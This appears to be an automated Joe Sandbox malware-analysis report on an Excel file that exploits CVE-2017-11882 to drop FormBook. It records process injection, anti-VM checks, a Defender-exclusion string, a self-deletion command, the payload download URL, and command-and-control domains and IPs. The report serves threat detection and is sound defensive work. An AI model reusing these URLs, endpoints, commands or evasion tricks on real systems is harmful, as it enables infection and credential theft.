          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A732E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,7_2_4A732E73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A736E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,7_2_4A736E47
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A750202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,7_2_4A750202
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A74BF0C FindFirstFileW,FindNextFileW,FindClose,7_2_4A74BF0C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A73BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,7_2_4A73BBA4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A750492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,7_2_4A750492
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 38861
          Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.506683745.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.506449406.000000000449C000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.486562840.000000000456F000.00000004.00000001.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 00000006.00000000.506449406.000000000449C000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000000
          Source: explorer.exe, 00000006.00000000.523158349.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.486667717.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.506683745.000000000457A000.00000004.00000001.sdmp Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A74D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,7_2_4A74D539
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A732E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,7_2_4A732E73
          Source: C:\Users\Public\vbc.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
          Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe Process token adjusted: Debug
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008926F8 mov eax, dword ptr fs:[00000030h] 5_2_008926F8
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023626F8 mov eax, dword ptr fs:[00000030h] 7_2_023626F8
          Source: C:\Users\Public\vbc.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort
          Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B30 LdrLoadDll,5_2_00409B30
          Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A7313A9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_4A7313A9
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A737C63 SetUnhandledExceptionFilter,7_2_4A737C63

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 108.170.14.102 80
          Source: C:\Windows\explorer.exe Domain query: www.dbe648.com
          Source: C:\Windows\explorer.exe Domain query: www.lacucinadesign.com
          Source: C:\Windows\explorer.exe Network Connect: 45.39.212.162 80
          Source: C:\Windows\explorer.exe Domain query: www.upinmyfeels.com
          Source: C:\Windows\explorer.exe Domain query: www.publicationsplace.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Domain query: www.ahljsm.com
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 4A730000
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764
          Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000000.502247197.0000000000750000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684820604.0000000000950000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.502247197.0000000000750000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684820604.0000000000950000.00000002.00020000.sdmp Binary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.502247197.0000000000750000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684820604.0000000000950000.00000002.00020000.sdmp Binary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exe Code function: _wcsicmp,GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetUserObjectInformationW,memmove,GetLocaleInfoW,GetTimeFormatW,7_2_4A73D701
          Source: C:\Windows\SysWOW64\cmd.exe Code function: GetDateFormatW,realloc,GetDateFormatW,_wcsicmp,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,memmove,GetSystemTime,SystemTimeToFileTime,memmove,GetLastError,realloc,7_2_4A74270D
          Source: C:\Windows\SysWOW64\cmd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,7_2_4A7388D9
          Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A744E44 GetSystemTime,SystemTimeToFileTime,7_2_4A744E44
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A73D3B3 GetVersion,7_2_4A73D3B3

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Path Interception | Process Injection 612 | Masquerading 111 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 11 | LSASS Memory | Security Software Discovery 231 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Virtualization/Sandbox Evasion 31 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | System Information Discovery 126 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact

          Behavior Graph

          [Behavior graph, ID 502343. Sample: OCT 13 2021 - PRINT COPY.xlsx; Startdate: 13/10/2021; Architecture: WINDOWS; Score: 100. Process chain shown: EQNEDT32.EXE -> vbc.exe -> vbc.exe -> explorer.exe (injected) -> cmd.exe -> cmd.exe, with EXCEL.EXE started alongside EQNEDT32.EXE.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          OCT 13 2021 - PRINT COPY.xlsx | 24% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://18.197.254.181/www1/deo.exe | 100% | Avira URL Cloud | malware
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://www.publicationsplace.com/ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV | 0% | Avira URL Cloud | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe
          http://java.sun.com | 0% | Avira URL Cloud | safe
          www.fis.photos/ef6c/ | 100% | Avira URL Cloud | malware
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://www.upinmyfeels.com/ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV | 100% | Avira URL Cloud | malware
          http://www.lacucinadesign.com/ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q== | 0% | Avira URL Cloud | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.ahljsm.com/ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg== | 0% | Avira URL Cloud | safe
          http://www.restaurant-utopia.xyz/ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV | 100% | Avira URL Cloud | phishing
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.restaurant-utopia.xyz | 172.67.213.229 | true | true |  | unknown
          emailforts.com | 108.170.14.102 | true | true |  | unknown
          lacucinadesign.com | 34.102.136.180 | true | false |  | unknown
          upinmyfeels.com | 34.102.136.180 | true | false |  | unknown
          www.ahljsm.com | 45.39.212.162 | true | true |  | unknown
          www.upinmyfeels.com | unknown | unknown | true |  | unknown
          www.dbe648.com | unknown | unknown | true |  | unknown
          www.publicationsplace.com | unknown | unknown | true |  | unknown
          www.lacucinadesign.com | unknown | unknown | true |  | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://18.197.254.181/www1/deo.exe | true | Avira URL Cloud: malware | unknown
          http://www.publicationsplace.com/ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV | true | Avira URL Cloud: safe | unknown
          www.fis.photos/ef6c/ | true | Avira URL Cloud: malware | low
          http://www.upinmyfeels.com/ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV | false | Avira URL Cloud: malware | unknown
          http://www.lacucinadesign.com/ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q== | false | Avira URL Cloud: safe | unknown
          http://www.ahljsm.com/ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg== | true | Avira URL Cloud: safe | unknown
          http://www.restaurant-utopia.xyz/ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV | true | Avira URL Cloud: phishing | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp | false |  | high
          http://investor.msn.com | explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp | false |  | high
          http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp | false |  | high
          http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp | false |  | high
          http://treyresearch.net | explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.collada.org/2005/11/COLLADASchema9Done | vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.492983646.00000000083C8000.00000004.00000001.sdmp | false |  | high
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp | false |  | high
          http://java.sun.com | explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000006.00000000.494645259.0000000001BE0000.00000002.00020000.sdmp | false |  | high
          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.498293005.000000000447A000.00000004.00000001.sdmp | false |  | high
          http://investor.msn.com/ | explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp | false |  | high
          http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.498293005.000000000447A000.00000004.00000001.sdmp | false |  | high
          http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
          http://www.%s.comPA | explorer.exe, 00000006.00000000.494645259.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
          http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp | false |  | high
          https://support.mozilla.org | explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp | false |  | high
          http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.505593565.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684965488.0000000001D50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

          Contacted IPs

          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          108.170.14.102 | emailforts.com | United States | 20454 | SSASN2US | true
          34.102.136.180 | lacucinadesign.com | United States | 15169 | GOOGLEUS | false
          18.197.254.181 | unknown | United States | 16509 | AMAZON-02US | false
          45.39.212.162 | www.ahljsm.com | United States | 18779 | EGIHOSTINGUS | true

          Private

          IP
          192.168.2.22
          192.168.2.255

                                                    General Information

                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                    Analysis ID:502343
                                                    Start date:13.10.2021
                                                    Start time:20:14:33
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 11m 53s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:OCT 13 2021 - PRINT COPY.xlsx
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:11
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winXLSX@9/13@6/6
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 19.7% (good quality ratio 19.2%)
                                                    • Quality average: 73.6%
                                                    • Quality standard deviation: 27.4%
                                                    HCA Information:
                                                    • Successful, ratio: 95%
                                                    • Number of executed functions: 79
                                                    • Number of non-executed functions: 166
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .xlsx
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                    • Not all processes were analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/502343/sample/OCT 13 2021 - PRINT COPY.xlsx

                                                    Simulations

                                                    Behavior and APIs

                                                    Time      Type             Description
                                                    20:15:46  API Interceptor  42x Sleep call for process: EQNEDT32.EXE modified
                                                    20:15:48  API Interceptor  99x Sleep call for process: vbc.exe modified
                                                    20:16:22  API Interceptor  212x Sleep call for process: cmd.exe modified
                                                    20:17:01  API Interceptor  1x Sleep call for process: explorer.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    Match           Associated Sample Name / URL  Detection  Context
                                                    108.170.14.102  kal88CSImD.exe                malicious  www.publicationsplace.com/ef6c/?FPUd=69obzrOo3kvhXIUcJOBGpgM4gb/C38tuSypHAlBxlvVDijots7NZ7PGFNkVKyy5oeYmT&vT=0TtH8ZZPwPr4v8R
                                                                    qZfsUMa6Jh.exe                malicious  www.publicationsplace.com/ef6c/?s4=69obzrOo3kvhXIUcJOBGpgM4gb/C38tuSypHAlBxlvVDijots7NZ7PGFNkZKhi1rHImF1WMfww==&RpQHH4=Hxlpd
                                                    45.39.212.162   1taaCpMNKr.exe                malicious  www.ahljsm.com/ef6c/?BHzdSbC=IVc4rtgOgn2l/Ia+jQBU9em9uNea1MXNkTqvIkEPqr+XBjQc1UvGjBges/HFNu2+v35w&XDK=DTqxPBg
                                                                    p83BktbXwe.exe                malicious  www.ahljsm.com/ef6c/?j0Dxf4=ilHXd&YFQLD6=IVc4rtgOgn2l/Ia+jQBU9em9uNea1MXNkTqvIkEPqr+XBjQc1UvGjBges8rsOuKGmUMmdUdlcQ==
                                                                    qZfsUMa6Jh.exe                malicious  www.ahljsm.com/ef6c/?s4=IVc4rtgOgn2l/Ia+jQBU9em9uNea1MXNkTqvIkEPqr+XBjQc1UvGjBges8rVRfqFoCQhdUdiPg==&y8=6lrLUjiXor8xt
                                                                    pdrAizaO1R.exe                malicious  www.ahljsm.com/ef6c/?9rQxK=IVc4rtgOgn2l/Ia+jQBU9em9uNea1MXNkTqvIkEPqr+XBjQc1UvGjBges8rVRfqFoCQhdUdiPg==&w4z=Wnyl

                                                    Domains

                                                    Match                      Associated Sample Name / URL  Detection  Context
                                                    www.restaurant-utopia.xyz  HUuKj0kt3z.exe                malicious  172.67.213.229
                                                                               zMO1n8NAdk.exe                malicious  104.21.35.47
                                                    www.ahljsm.com             1taaCpMNKr.exe                malicious  45.39.212.162
                                                                               p83BktbXwe.exe                malicious  45.39.212.162
                                                                               4ZfdpLEQn1.exe                malicious  45.39.212.162
                                                                               qZfsUMa6Jh.exe                malicious  45.39.212.162
                                                                               pdrAizaO1R.exe                malicious  45.39.212.162
                                                    emailforts.com             kal88CSImD.exe                malicious  108.170.14.102
                                                                               qZfsUMa6Jh.exe                malicious  108.170.14.102

                                                    ASN

                                                    Match     Associated Sample Name / URL  Detection  Context
                                                    SSASN2US  kal88CSImD.exe                malicious  108.170.14.102
                                                              PO 4500151298.xlsx            malicious  131.153.37.3
                                                              Dylan#75658241.html           malicious  69.160.44.101
                                                              qZfsUMa6Jh.exe                malicious  108.170.14.102
                                                              2GQL8eREln.exe                malicious  131.153.142.106
                                                              SOA.exe                       malicious  198.15.70.42
                                                              QUOTATION.xlsx                malicious  131.153.37.3
                                                              UwJpeFp2qK                    malicious  66.85.168.27
                                                              leakdetails.xlsx              malicious  131.153.37.3
                                                              k511cDa8ud                    malicious  198.15.85.46
                                                              bot.x86                       malicious  131.153.142.106
                                                              sora.x86                      malicious  184.95.63.66
                                                              peach.arm                     malicious  192.34.99.31
                                                              U14s4IbToI.exe                malicious  198.24.151.139
                                                              uYtea.x86                     malicious  198.15.115.185
                                                              Swift Copy.xlsx               malicious  131.153.37.3
                                                              1wKONPeBx1.exe                malicious  184.164.143.218
                                                              y1FOl1vVPA.exe                malicious  184.164.136.210
                                                              EVC5DDtdso.exe                malicious  184.164.136.210
                                                              PFm5r5Zeb4.exe                malicious  184.95.45.242

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\deo[1].exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:downloaded
                                                    Size (bytes):474112
                                                    Entropy (8bit):7.47098319943845
                                                    Encrypted:false
                                                    SSDEEP:6144:zMkhBsNolyfnZle9UX08PF85KQ4O1LkyUCZ2e12XZ0bp2Qo7lYB:oSBblyfnZlW+08+5KQpyy52nZ0vo7a
                                                    MD5:6429AA83E4BC083B4F0B3F44B0D7950F
                                                    SHA1:0EAD59881F054284F611ACCB61451ED1FFC818FC
                                                    SHA-256:96C57AE661562E958E01BB0B490C09A0A51BB367931620223174963DE88BDFCB
                                                    SHA-512:186383701C591DB2C011C8AE24920759C10880068DD217E32110AE54B9C7F0863B7FB04E893F601A234742DEB5838A22820DC8835BA9198D66B7BB297D502F9B
                                                    Malicious:true
                                                    Reputation:low
                                                    IE Cache URL:http://18.197.254.181/www1/deo.exe
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1456B9B2.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
